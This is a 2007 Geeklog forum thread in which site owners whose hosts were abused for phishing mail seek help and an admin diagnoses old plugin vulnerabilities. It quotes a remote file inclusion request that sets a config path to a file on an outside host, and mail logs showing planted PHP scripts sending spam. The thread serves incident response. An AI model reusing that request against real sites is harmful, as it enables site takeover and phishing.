Welcome to Geeklog, Anonymous Friday, March 29 2024 @ 10:48 am EDT

Geeklog Forums

phising mails


Status: offline

Goofy

Forum User
Newbie
Registered: 03/02/07
Posts: 6
Someone has hacked my site and phising 1203 mails for RBC Royal Bank.

My ISP send me information that the problem is in:
GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http:// crazedey . 110mb. com / smp. txt?

He has suspended my site until i fix the problem
I am using Version 1.4.1

Does anyone know what to do !
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
The request you quoted from your ISP doesn't make sense in two ways:

1) This is not a valid path, i.e. no file exists with that URL, so it can't do anything.
2) The problem this script kiddie tried to exploit has been fixed in Geeklog 1.4.1

We are seeing hundreds of these requests here on geeklog.net every day - they simply don't do anything any more. So if you're 100% sure that you are on Geeklog 1.4.1 and that it was installed (or possibly upgraded, from an earlier version) correctly, then this is NOT the cause of whatever has happened.

Do you have any other plugins installed on your site? For example, both MediaGallery and the CAPTCHA plugin had a very similar problem at one point (updates for both have been released in May of this year).

bye, Dirk
 Quote

Status: offline

Goofy

Forum User
Newbie
Registered: 03/02/07
Posts: 6
Hi Dirk,

Blaine has upgraded my site to 1.4.1

I have these plugins installed on my site:
calendar 1.0.0
chatterblock 1.3.11 (not enabled)
forum 2.6
glmenu 2.5
links 1.0.1
mediagallery 1.4.7
messenger 1,7
newsletter 1.0
polls 1.1.0
registration 1.2
spamx 1.1.0
staticpages 1.4.3
filemgmt 1.5.2

 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: Goofy

mediagallery 1.4.7


I can't vouch for all the plugins you listed (for example, I don't even know the newsletter plugin), but that version of MediaGallery is vulnerable. See Marks posting: Security Vulnerability in Media Gallery v1.4x

bye, Dirk
 Quote

Lex

Anonymous
I just got an email from my host saying something similar. They said to check my mail logs to see which script is being exploited. It looks like spamx is being exploited? Any suggestions on how to solve this?

This is what my mail log says:

Text Formatted Code
2007-12-10 12:52:29 u35565200 3oUgls-1J1mnt2mdy-0005zH |< REMOTE=41.211.226.167 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
2007-12-10 12:52:29 u35565200 3oUgls-1J1mnt2mdy-0005zH <= S=accounts.verisign@key.com SZ=4166 D=0 SID=90628944
2007-12-10 12:52:31 u35565200 3oUgls-1J1mnt2mdy-0005zH => johnboy3159@yahoo.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1mnt36ye-0006RO accepted by mrus0.perfora.net
2007-12-10 12:52:31 u35565200 3oUgls-1J1mnv3Pci-0005zd |< REMOTE=41.211.226.167 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
2007-12-10 12:52:31 u35565200 3oUgls-1J1mnv3Pci-0005zd <= S=accounts.verisign@key.com SZ=4167 D=0 SID=90628944
2007-12-10 12:52:33 u35565200 3oUgls-1J1mnv3Pci-0005zd => johnboy38375@yahoo.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1mnv3gdN-0006Lm accepted by mrus0.perfora.net
2007-12-10 13:58:40 u35565200 3oUgls-1J1npw11YB-0002OY |< REMOTE=82.78.173.224 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:58:40 u35565200 3oUgls-1J1npw11YB-0002OY <= S=cgi-mailer-bounces-90628944@perfora.net SZ=695 D=0 SID=90628944
2007-12-10 13:58:42 u35565200 3oUgls-1J1npw11YB-0002OY => kaiowas2000@gmail.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKpCa-1J1npx0asO-0001wq accepted by mrus1.perfora.net
2007-12-10 13:58:55 u35565200 3oUgls-1J1nqB0wKW-0002R0 |< REMOTE=82.78.173.224 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:58:55 u35565200 3oUgls-1J1nqB0wKW-0002R0 <= S=cgi-mailer-bounces-90628944@perfora.net SZ=695 D=0 SID=90628944
2007-12-10 13:58:56 u35565200 3oUgls-1J1nqB0wKW-0002R0 => kaiowas2000@gmail.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1nqB2cVu-0006QH accepted by mrus0.perfora.net
2007-12-10 13:59:05 u35565200 3oUgls-1J1nqL0bJq-0002Ti |< REMOTE=82.78.173.224 SCRIPT=/club80s/plugins/spamx/Mass.php -- /usr/sbin/sendmail -t -i
2007-12-10 13:59:05 u35565200 3oUgls-1J1nqL0bJq-0002Ti <= S=cgi-mailer-bounces-90628944@perfora.net SZ=695 D=0 SID=90628944
2007-12-10 13:59:06 u35565200 3oUgls-1J1nqL0bJq-0002Ti => kaiowas2000@gmail.com msmtp.perfora.net[172.19.143.3] 250 Message 0MKp8S-1J1nqL0yNw-0006Bx accepted by mrus0.perfora.net
 Quote

Lex

Anonymous
The other problem is that I can't log in because of a header issue and disable the plug-in. (Dirk, we're talking about that in another thread)
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by: Lex

Text Formatted Code
2007-12-10 12:52:29 u35565200 3oUgls-1J1mnt2mdy-0005zH |< REMOTE=41.211.226.167 SCRIPT=/club80s/plugins/spamx/templates/s.php -- /usr/sbin/sendmail -t -i
 


That doesn't look good. There's a file "s.php" in your spamx/templates directory that shouldn't be there. Remove that file ASAP (you may want to keep a copy for forensics, but remove it from there).

Next, how did it get there? See my replies to Goofy above: There was a security issue in Geeklog (and in some plugins), but it has been fixed quite some time ago. Make sure you're up to date.

bye, Dirk
 Quote

Lex

Anonymous
Yes, I deleted that s.php file and kept a copy of it. The problem is I can't log into my site to update it because of the header problem. Doh! Guess I should get on your mailing list to be notified of updates.
 Quote

All times are EDT. The time is now 10:48 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content